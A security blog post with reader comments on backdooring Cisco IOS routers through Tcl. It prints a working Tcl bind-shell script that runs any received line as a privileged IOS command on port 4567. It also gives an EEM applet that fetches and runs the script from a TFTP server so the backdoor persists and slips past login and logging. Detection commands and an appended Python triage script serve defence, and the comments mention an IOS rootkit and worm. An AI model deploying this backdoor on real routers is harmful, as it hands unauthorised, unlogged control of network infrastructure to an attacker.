Attacking Cisco Router over TCL

Today only a lazy person, or one outside the IT sphere, has never heard of Cisco, the company that specialises in developing network devices and solving the problems around them. IOS (Internetwork Operating System) is installed on Cisco networking equipment and allows flexible system configuration. There are different methods for attacking Cisco devices; what we will look at here is attacking Cisco devices using Tcl.


Tcl (Tool Command Language)
is a scripting language used on embedded systems platforms, both in its full form and in several small-footprint versions. Starting with Cisco IOS 12.3 (7/28/2003), Tcl has been included in Cisco IOS as a generic scripting language, and the Tcl shell (tclsh) on the router can execute IOS commands through its exec command.

When you first log in to a Cisco router you are in user EXEC mode (privilege level 1). From this mode you only get limited information, such as interface status or the routes in the routing table. To execute a Tcl script you need privilege level 15 (full administrative rights), which is equivalent to root on UNIX or Administrator on Windows. In other words, this is a post-exploitation technique: you must already have enable access to the router before any of the following works.

To upload the Tcl script to the Cisco device you can use different protocols such as TFTP, RCP or SCP (tclsh also accepts the TFTP URL directly, so copying to flash is optional). With TFTP you do the following:

Router> enable
Router# copy tftp://tftpserver/script.tcl flash:script.tcl
Router# tclsh flash:script.tcl

The Tcl script was originally published by Andy Davis of Information Risk Management (IRM); after some modification it looks as follows:

# Tcl backdoor for IOS tclsh: listens on a TCP port and runs every line it
# receives as an IOS command in the router's exec context.
proc callback {sock addr port} {
    # line buffering with LF line endings, so a plain telnet client works
    fconfigure $sock -translation lf -buffering line
    puts $sock " Enter your desired IOS command:"
    puts $sock " "
    puts -nonewline $sock "Router# "
    flush $sock
    fileevent $sock readable [list echo $sock]
}
proc echo {sock} {
    if {[eof $sock] || [catch {gets $sock line}]} {
        # the client went away: drop this connection, keep the listener
        close $sock
    } else {
        # exec hands the line to the IOS CLI parser and returns its output;
        # catch keeps a mistyped command from killing the handler
        catch {exec "$line"} response
        puts $sock $response
        puts -nonewline $sock "Router# "
        flush $sock
    }
}
set port 4567
set sh [socket -server callback $port]
# nothing ever sets var, so vwait keeps the event loop (and the listener)
# running until the tclsh process is terminated
vwait var
close $sh

With this script running, the router has a backdoor: an attacker who connects with telnet to port 4567 will see the following:

$ telnet router 4567
Trying router...
Connected to router.
Escape character is '^]'.

Enter your desired IOS command:

Router#

This has been addressed in more recent IOS versions, but you can still use the same technique if you wrap the tclsh call in an EEM (Embedded Event Manager) applet and have a timer event trigger it, as follows. Note that a countdown timer fires once, 20 seconds after the applet is configured; if you want the policy to run periodically, use a watchdog timer instead (event timer watchdog time 20).

Router> enable
Router# configure terminal
Router(config)# event manager applet Tclsh
Router(config-applet)# event timer countdown name Delay time 20
Router(config-applet)# action 1.0 cli command "enable"
Router(config-applet)# action 2.0 cli command "tclsh tftp://tftpserver/script.tcl"

By running the backdoor a penetration tester gets command execution on the target router without passing through login authentication or the access logging tied to it, since no VTY login ever takes place. To check whether your router carries such a listener, run:

Router # show tcp brief all

This is the equivalent of netstat on Windows or Linux: it lists every TCP connection that is established or waiting to be established on the router, so an unexpected listener (here *.4567 in LISTEN state) stands out. For the EEM variant, also check the registered policies and the running configuration (show event manager policy registered, show running-config | include tclsh). For the security of your business, run a current IOS version, keep all your systems updated, and follow best practices when deploying or configuring any device.
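To make that check repeatable across a whole estate, here is an added example in Python (not code from the original post and not a Cisco tool) that parses saved show tcp brief all output and a running-config dump offline, flags any listener on a port the router is not expected to serve together with the sessions connected to it, and lists EEM applets whose action launches tclsh. The sample outputs, the session endpoints and the allowlist of expected ports are constructed assumptions; tune the allowlist to what your routers are supposed to serve.

```python
"""Offline triage of "show tcp brief all" output and a running-config dump.

Added example, not from the original post or from Cisco. Flags the two
artefacts described above: a Tcl listener on an unexpected TCP port and an
EEM applet that launches tclsh. Sample data and the port allowlist are
constructed assumptions.
"""
import re
from dataclasses import dataclass
from typing import List

# Assumption: ports a managed router is expected to listen on (SSH, telnet,
# HTTP/HTTPS management, BGP). Any other port in LISTEN state gets flagged.
EXPECTED_LISTEN_PORTS = {22, 23, 80, 443, 179}

# One data row: TCB, local addr.port, foreign addr.port, state. The header
# line has more than four whitespace-separated tokens, so it never matches.
TCP_ROW = re.compile(r"^\s*([0-9A-Fa-fx]+)\s+(\S+)\s+(\S+)\s+(\S+)\s*$")

# Constructed sample: an SSH listener, the Tcl backdoor on 4567 and one
# attacker session connected to it.
SAMPLE_TCP = """\
TCB       Local Address               Foreign Address             (state)
6523A4FC  *.22                        *.*                         LISTEN
65249C10  *.4567                      *.*                         LISTEN
65252A5C  192.168.1.1.4567            192.168.1.50.41532          ESTAB
6524B7A4  192.168.1.1.22              192.168.1.50.52000          ESTAB
"""

# Constructed sample config: the applet from the post next to a harmless one.
SAMPLE_CONFIG = """\
event manager applet Tclsh
 event timer countdown name Delay time 20
 action 1.0 cli command "enable"
 action 2.0 cli command "tclsh tftp://tftpserver/script.tcl"
!
event manager applet Backup
 event timer watchdog time 3600
 action 1.0 cli command "enable"
 action 2.0 cli command "copy running-config tftp://tftpserver/backup.cfg"
!
"""


@dataclass(frozen=True)
class TcpSocket:
    tcb: str
    local: str
    foreign: str
    state: str

    @property
    def local_port(self) -> int:
        # IOS prints "address.port"; the port is whatever follows the last
        # dot ("*.4567" and "192.168.1.1.4567" both give 4567).
        return int(self.local.rsplit(".", 1)[1])


def parse_show_tcp_brief(text: str) -> List[TcpSocket]:
    """Turn the command output into TcpSocket records, skipping the header."""
    return [TcpSocket(*m.groups())
            for m in (TCP_ROW.match(line) for line in text.splitlines()) if m]


def suspicious_listeners(sockets, expected=frozenset(EXPECTED_LISTEN_PORTS)):
    """LISTEN sockets on ports the router is not supposed to serve."""
    return [s for s in sockets
            if s.state == "LISTEN" and s.local_port not in expected]


def sessions_to_port(sockets, port: int):
    """Non-listening sockets on a local port: who is talking to the backdoor."""
    return [s for s in sockets if s.state != "LISTEN" and s.local_port == port]


def eem_applets_running_tclsh(config: str) -> List[str]:
    """Names of EEM applets with at least one action that invokes tclsh."""
    hits, current = [], None
    for line in config.splitlines():
        m = re.match(r"^event manager applet (\S+)", line)
        if m:
            current = m.group(1)
        elif not line.startswith(" "):
            current = None  # left the applet's indented block ("!" or blank)
        elif (current and line.strip().startswith("action")
              and "tclsh" in line.lower() and current not in hits):
            hits.append(current)
    return hits


if __name__ == "__main__":
    socks = parse_show_tcp_brief(SAMPLE_TCP)
    for s in suspicious_listeners(socks):
        print(f"unexpected listener {s.local} ({s.state})")
        for peer in sessions_to_port(socks, s.local_port):
            print(f"  connected from {peer.foreign}")
    for name in eem_applets_running_tclsh(SAMPLE_CONFIG):
        print(f"EEM applet '{name}' launches tclsh")
```

Feed it the output collected from each router and the allowlist for that router's role; the foreign address of any session attached to a flagged listener is the first pivot for the incident timeline.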

Warning: The technique demonstrated is intended only for use during an authorized penetration testing engagement.

References:

Cisco, Cisco IOS Scripting with Tcl, http://www.cisco.com/en/US/docs/ios/12_3t/12_3t2/feature/guide/gt_tcl.html

SANS Institute, IOScat – a Port of Netcat's TCP functions to Cisco IOS, http://www21.sans.org/reading_room/whitepapers/tools/iosmap-tcp-udp-port-scanning-cisco-ios-platforms_32964

  • Jbossvi

    Yeah, I demoed this at Black Hat 2010
    http://blackhat.com/html/bh-us-10/bh-us-10-specialevents_arsenal.html#nehrboss

    It was an IOS rootkit and a self-propagating IOS worm. The rootkit had a forward/reverse shell, a traffic pcap dumper, a malware httpd server and other stuff. It was all done in tclsh.

  • Mourad (http://sectechno.com)

    Thanks for the comment Jason, can I have more details about the lab?

  • Jbossvi

    here is the pdf, lots of examples of the rootkit+accessories, The worm is not public though.

    http://www.surf.vi/docs/san_fran.pdf

  • Mourad (http://sectechno.com)

    Thanks for sharing Jason, very interesting demonstration.

  • E-devlet

    This is one of the best posts that I’ve ever seen; you may include some more ideas in the same theme. I’m still waiting for some interesting thoughts from your side in your next post.

  • fmarousek

    The first version of this attack (using tclsh) was fixed in IOS 12.4(15)T. The second (using an EEM policy) in IOS 12.4(20)T1.

  • johnright

    Awesome.
    For Router Pictures

  • I_laji.co

    en
    Here I have a question:
    How do you configure Tcl on Cisco IOS if it has not been configured? IOS version > 12.4(20)T